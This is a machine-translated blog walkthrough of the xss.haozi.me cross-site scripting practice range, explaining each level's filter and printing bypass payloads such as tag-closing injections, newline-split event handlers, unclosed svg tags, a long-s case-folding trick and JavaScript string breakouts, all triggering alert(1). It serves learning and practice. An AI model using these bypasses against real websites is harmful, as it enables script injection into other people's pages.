当前位置:网站首页>XSS range (II) xss.haozi
XSS range (II) xss.haozi
2022-07-29 02:33:00 【The tree lost its way】
Target address :https://xss.haozi.me
0x00
Unprotected
<script>alert(1)</script>
0x01
stay <textarea> Label inside this label , All scripting languages are strings , Cannot be called to execute , Just close the label ;
</textarea><script>alert(1)</script>
0x02
closed " and < that will do
"><script>alert(1)</script>
aaa" onclick="alert(1) 
0x03
Regular expressions , take () Replace empty , use `` Instead, that is
<script>alert`1`</script>
0x04
Regular expressions , take () `` Replace empty ,HTML Entity encoding ()
<svg><script>alert(1)</script>
0x05
Here we replace with regular -->,html The annotators of are 2 Species writing :
<!-- Content of notes --> The other is <!-- Content of notes --!>
--!><script>alert(1)</script>
0x06
The canonical substitution here is auto and on.*= and > character , So I filtered js Of autofocus Events and on The first event ;
But there is no filter line feed , Sure utilize HTML Fault tolerance mechanism of , As long as the keywords and syntax are correct , Features unaffected by spaces and newlines
onclick
=alert(1)
onmousedown
=alert(1)
type=image src=1 onerror
=alert(1)
0x07
Regular <\/?[^>]+> This pile , With "<" start ">" The ending is interspersed with non ">" Case insensitive string of ,
in general , Just replace </ Any character > It's empty . use <svg Labels and THTML Fault tolerant mechanism does not write ">" that will do
<svg onload=alert(1)//
<svg onload=alert(1)\n
<img src=1 onerror="alert(1)"
0x08
Regular filtering </style>, Make it impossible to close ;
and 6 7 The questions are similar to , Or use HTML Fault tolerance for </style Followed by a space or enter
</style ><script>alert(1)</script>
</style
><script>alert(1)</script>
0x09
Use regular rules to specify that the input string must have https://www.segmentfault.com1;
Then write it later ," closed ></script> closed , And then note out ">
https://www.segmentfault.com1"></script><script>alert(1)//
0x0A
Similar to the previous question , Another one ' " < > / It's all filtered
Use in the middle of the website @ Symbol , Redirect to @ The following fields URL;( Google seems to have a protection mechanism , Try it on Firefox )
https://[email protected]/j.js
0x0B
Lose ⼊ All strings of are converted ⼤ Yes ;
html Case insensitive ,JS Case sensitive ;
use <svg οnlοad=alert(1)>, Yes 'alert' Entity encoding ;
<svg onload=alert(1)>
0x0C
It's similar to the last question , Just one more pair script The filter ;
If you use <script>, Double write ;
<svg onload=alert(1)>
<sscriptcript src=1 onerror=alert(1)></sscriptcript>
0x0D
Regular filtering < / " ' , Don't have to ;
Enter escape single line notes , Add the extra ‘)
Return here
alert(1)
-->
0x0E
The regular match here <a-zA-Z>, give back < Add... To the back _, And capitalize , This filters almost all tags ;
So we need to use a strange skill : There is such a character ſ , It will become S;
<ſcript src=1 onerror=alert(1)></script>
<ſvg onload=alert(1)>
0x0F
This is similar to question 10 , take & ' " <> / to HTML Entity code ;
But here's the thing , The character we entered is still in html in , Therefore, even if it is encoded, its function can be performed ;
Before and after closing (' ') Or note out that will do ;
');alert(1);('
0x10
Unprotected , to data Just a value ;
');alert(1);('
0x11
and 15 Same question , hold / ’ " ` < > \ And line breaks are escaped ;
Before and after closing (" ") that will do ;
stay JS Right in the code / The escape of is actually superfluous , In practical use ,/ Not a special symbol , No escape required , It can output directly
");alert(1);("
");alert(1);//
0x12
take " It's escaped ;
Why do I need double quotation marks , Directly close the front <script>, Then put the back ') Inject it out that will do ;
It's fine too take \ To escape , Let it fail , Then close ("
</script><script>alert(1)//
a\");alert(1);//
ok Get it done ! Personal habits are different , The answer is not unique , If there are different solutions , Welcome to share !
边栏推荐
- PS + PL heterogeneous multicore case development manual for Ti C6000 tms320c6678 DSP + zynq-7045 (2)
- Servlet三种实现方式
- Never pass a request to an asynchronous thread. There is a hole
- Time pit in MySQL driver
- In depth analysis - Pretreatment
- Exploration and practice of network security vulnerability management
- Responsive dream weaving template makeup website
- 工程经济学知识点总结
- When synchronized encounters this thing, there is a big hole, so be careful
- DevOps 团队如何抵御 API 攻击?
猜你喜欢
Keil5 open the engineering prompt not found device solution
MySQL和Redis的双写一致性
On Multithreading
[email protected] The localization rate reaches 100%"/>Quanzhi t3/a40i industrial core board, 4-core [email protected] The localization rate reaches 100%
ES6 event binding (v-on usage)
QT qstackedwidget multi interface switching
聊聊 Feign 的实现原理
快速掌握Nodejs安装以及入门
How does the Devops team defend against API attacks?
![[mqtt from introduction to improvement series | 09] Wireshark packet capturing and analyzing mqtt messages](/img/dd/c7ad9addb0d15611d996db87bf469f.png)
[mqtt from introduction to improvement series | 09] Wireshark packet capturing and analyzing mqtt messages
随机推荐
物联网组件
On Multithreading
当我看源码的时候,我在想什么?
如何快速设计一套支持渲染富文本内容的跨端组件
结合Retrofit 改造OKHttp 缓存
MySQL驱动中关于时间的坑
Responsive dream weaving template home decoration website
Day 14: continued day 13 label related knowledge
Polygon point test
手把手教你安装VSCode(附带图解步骤)
快速掌握Nodejs安装以及入门
Remember error scheduler once Asynceventqueue: dropping event from queue shared causes OOM
MySQL基本操作和基于MySQL基本操作的综合实例项目
Production scheme and advantages of online 3D digital exhibition hall
Chapter 3 business function development (deletion and modification of clue remarks)
The first of the five tips for using browsers efficiently is the most practical
7/28 高斯消元解线性方程组+高斯消元解异或线性方程组 +求组合数ii
ES2022 的 8 个实用的新功能
工程经济学简答题
When synchronized encounters this thing, there is a big hole, so be careful